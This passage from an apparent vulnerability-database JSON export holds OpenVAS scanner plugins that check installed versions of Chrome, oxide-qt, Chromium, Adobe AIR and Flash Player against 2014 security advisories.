value:\"http://googlechromereleases.blogspot.in/2014/11/stable-channel-update_18.html\");\n\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_portable_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chromeVer, test_version:\"39.0.2171.65\"))\n{\n report = report_fixed_ver(installed_version:chromeVer, fixed_version:\"39.0.2171.65\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-22T17:03:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2020-04-20T00:00:00", "published": "2014-11-25T00:00:00", "id": "OPENVAS:1361412562310804893", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804893", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities - 01 November14 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities - 01 November14 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804893\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-7900\", \"CVE-2014-7901\", \"CVE-2014-7902\", \"CVE-2014-7903\",\n \"CVE-2014-7904\", \"CVE-2014-7906\", \"CVE-2014-7907\", \"CVE-2014-7908\",\n \"CVE-2014-7909\", \"CVE-2014-7910\", \"CVE-2014-7899\");\n script_bugtraq_id(71163, 71158, 71165, 71164, 71166, 71159, 71170, 71168,\n 71167, 71161, 71160);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-25 18:46:35 +0530 (Tue, 25 Nov 2014)\");\n script_name(\"Google Chrome Multiple Vulnerabilities - 01 November14 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - A use-after-free error in pdfium.\n\n - An integer overflow error in pdfium.\n\n - Another use-after-free error in pdfium.\n\n - An unspecified error in pdfium.\n\n - An unspecified error in Skia.\n\n - A use-after-free error in pepper plugins.\n\n - Multiple use-after-free errors in blink.\n\n - An integer overflow error in media.\n\n - An unspecified error in Skia.\n\n - Other Multiple unspecified errors.\n\n - An unspecified error that can be exploited to spoof the address bar.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to disclose potentially sensitive information, conduct spoofing attacks,\n bypass certain security restrictions, and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 39.0.2171.65\n on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version 39.0.2171.65\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62546\");\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2014/11/stable-channel-update_18.html\");\n\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chromeVer, test_version:\"39.0.2171.65\"))\n{\n report = report_fixed_ver(installed_version:chromeVer, fixed_version:\"39.0.2171.65\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7908", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7910"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-11-20T00:00:00", "id": "OPENVAS:1361412562310842037", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842037", "type": "openvas", "title": "Ubuntu Update for oxide-qt USN-2410-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2410_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for oxide-qt USN-2410-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842037\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-11-20 06:42:55 +0100 (Thu, 20 Nov 2014)\");\n script_cve_id(\"CVE-2014-7904\", \"CVE-2014-7907\", \"CVE-2014-7908\", \"CVE-2014-7909\",\n \"CVE-2014-7910\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Ubuntu Update for oxide-qt USN-2410-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'oxide-qt'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A buffer overflow was discovered in Skia. If a\nuser were tricked in to opening a specially crafted website, an attacked could\npotentially exploit this to cause a denial of service via renderer crash or execute\narbitrary code with the privileges of the sandboxed render process. (CVE-2014-7904)\n\nMultiple use-after-frees were discovered in Blink. If a user were tricked\nin to opening a specially crafted website, an attacked could potentially\nexploit these to cause a denial of service via renderer crash or execute\narbitrary code with the privileges of the sandboxed render process.\n(CVE-2014-7907)\n\nAn integer overflow was discovered in media. If a user were tricked in to\nopening a specially crafted website, an attacked could potentially exploit\nthis to cause a denial of service via renderer crash or execute arbitrary\ncode with the privileges of the sandboxed render process. (CVE-2014-7908)\n\nAn uninitialized memory read was discovered in Skia. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit this to cause a denial of service via renderer crash.\n(CVE-2014-7909)\n\nMultiple security issues were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial of\nservice via application crash or execute arbitrary code with the\nprivileges of the user invoking the program. (CVE-2014-7910)\");\n script_tag(name:\"affected\", value:\"oxide-qt on Ubuntu 14.10,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2410-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2410-1/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.3.4-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.3.4-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs:amd64\", ver:\"1.3.4-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs:i386\", ver:\"1.3.4-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs-extra:amd64\", ver:\"1.3.4-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs-extra:i386\", ver:\"1.3.4-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0\", ver:\"1.3.4-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs\", ver:\"1.3.4-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs-extra\", ver:\"1.3.4-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3200", "CVE-2014-7899", "CVE-2014-3192", "CVE-2014-3193", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-3194", "CVE-2014-3198", "CVE-2014-7901", "CVE-2014-3199", "CVE-2014-7903", "CVE-2014-3189", "CVE-2014-3191", "CVE-2014-7910", "CVE-2014-3195", "CVE-2014-3197", "CVE-2014-3190", "CVE-2014-3188", "CVE-2014-7902", "CVE-2014-7900"], "description": "Gentoo Linux Local Security Checks GLSA 201412-13", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121299", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121299", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201412-13", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201412-13.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121299\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:10 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201412-13\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Chromium. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201412-13\");\n script_cve_id(\"CVE-2014-3188\", \"CVE-2014-3189\", \"CVE-2014-3190\", \"CVE-2014-3191\", \"CVE-2014-3192\", \"CVE-2014-3193\", \"CVE-2014-3194\", \"CVE-2014-3195\", \"CVE-2014-3197\", \"CVE-2014-3198\", \"CVE-2014-3199\", \"CVE-2014-3200\", \"CVE-2014-7899\", \"CVE-2014-7900\", \"CVE-2014-7901\", \"CVE-2014-7902\", \"CVE-2014-7903\", \"CVE-2014-7904\", \"CVE-2014-7906\", \"CVE-2014-7907\", \"CVE-2014-7908\", \"CVE-2014-7909\", \"CVE-2014-7910\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201412-13\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-client/chromium\", unaffected: make_list(\"ge 39.0.2171.65\"), vulnerable: make_list(\"lt 39.0.2171.65\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-22T17:03:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "description": "This host is installed with Adobe AIR\n and is prone to multiple vulnerabilities.", "modified": "2020-04-20T00:00:00", "published": "2014-11-14T00:00:00", "id": "OPENVAS:1361412562310804797", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804797", "type": "openvas", "title": "Adobe AIR Multiple Vulnerabilities(APSB14-24)-(Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe AIR Multiple Vulnerabilities(APSB14-24)-(Mac OS X)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804797\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-0573\", \"CVE-2014-0574\", \"CVE-2014-0576\", \"CVE-2014-0577\",\n \"CVE-2014-0581\", \"CVE-2014-0582\", \"CVE-2014-0583\", \"CVE-2014-0584\",\n \"CVE-2014-0585\", \"CVE-2014-0586\", \"CVE-2014-0588\", \"CVE-2014-0589\",\n \"CVE-2014-0590\", \"CVE-2014-8437\", \"CVE-2014-8438\", \"CVE-2014-8440\",\n \"CVE-2014-8441\", \"CVE-2014-8442\");\n script_bugtraq_id(71033, 71041, 71037, 71038, 71042, 71039, 71035, 71043, 71044,\n 71045, 71048, 71051, 71046, 71036, 71049, 71047, 71050, 71040);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-14 11:58:00 +0530 (Fri, 14 Nov 2014)\");\n script_name(\"Adobe AIR Multiple Vulnerabilities(APSB14-24)-(Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe AIR\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - An use-after-free error.\n\n - A double free error.\n\n - Multiple type confusion errors.\n\n - An error related to a permission issue.\n\n - Multiple unspecified error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to disclose potentially sensitive information, bypass certain security\n restrictions, and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe AIR version before 15.0.0.356\n on Mac OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe AIR version\n 15.0.0.356 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/59978\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-24.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Air/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"15.0.0.356\"))\n{\n report = report_fixed_ver(installed_version:airVer, fixed_version:\"15.0.0.356\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851108", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851108", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2014:1442-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851108\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 20:14:09 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-0573\", \"CVE-2014-0574\", \"CVE-2014-0576\", \"CVE-2014-0577\", \"CVE-2014-0581\", \"CVE-2014-0582\", \"CVE-2014-0583\", \"CVE-2014-0584\", \"CVE-2014-0585\", \"CVE-2014-0586\", \"CVE-2014-0588\", \"CVE-2014-0589\", \"CVE-2014-0590\", \"CVE-2014-8437\", \"CVE-2014-8438\", \"CVE-2014-8440\", \"CVE-2014-8441\", \"CVE-2014-8442\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2014:1442-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"flash-player was updated to version 11.2.202.418 to fix 18 security issues:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2014-0576, CVE-2014-0581, CVE-2014-8440, CVE-2014-8441).\n\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2014-0573, CVE-2014-0588, CVE-2014-8438).\n\n * A double free vulnerability that could lead to code execution\n (CVE-2014-0574).\n\n * Type confusion vulnerabilities that could lead to code execution\n (CVE-2014-0577, CVE-2014-0584, CVE-2014-0585, CVE-2014-0586,\n CVE-2014-0590).\n\n * Heap buffer overflow vulnerabilities that could lead to code\n execution (CVE-2014-0582, CVE-2014-0589).\n\n * An information disclosure vulnerability that could be exploited to\n disclose session tokens (CVE-2014-8437).\n\n * A heap buffer overflow vulnerability that could be exploited to\n perform privilege escalation from low to medium integrity level\n (CVE-2014-0583).\n\n * A permission issue that could be exploited to perform privilege\n escalation from low to medium integrity level (CVE-2014-8442).\");\n\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-24.html\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1442-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.418~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.418~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.418~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-22T17:03:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2020-04-20T00:00:00", "published": "2014-11-14T00:00:00", "id": "OPENVAS:1361412562310804795", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804795", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities(APSB14-24)-(Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities(APSB14-24)-(Linux)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804795\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-0573\", \"CVE-2014-0574\", \"CVE-2014-0576\", \"CVE-2014-0577\",\n \"CVE-2014-0581\", \"CVE-2014-0582\", \"CVE-2014-0583\", \"CVE-2014-0584\",\n \"CVE-2014-0585\", \"CVE-2014-0586\", \"CVE-2014-0588\", \"CVE-2014-0589\",\n \"CVE-2014-0590\", \"CVE-2014-8437\", \"CVE-2014-8438\", \"CVE-2014-8440\",\n \"CVE-2014-8441\", \"CVE-2014-8442\");\n script_bugtraq_id(71033, 71041, 71037, 71038, 71042, 71039, 71035, 71043, 71044,\n 71045, 71048, 71051, 71046, 71036, 71049, 71047, 71050, 71040);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-14 11:47:37 +0530 (Fri, 14 Nov 2014)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities(APSB14-24)-(Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n 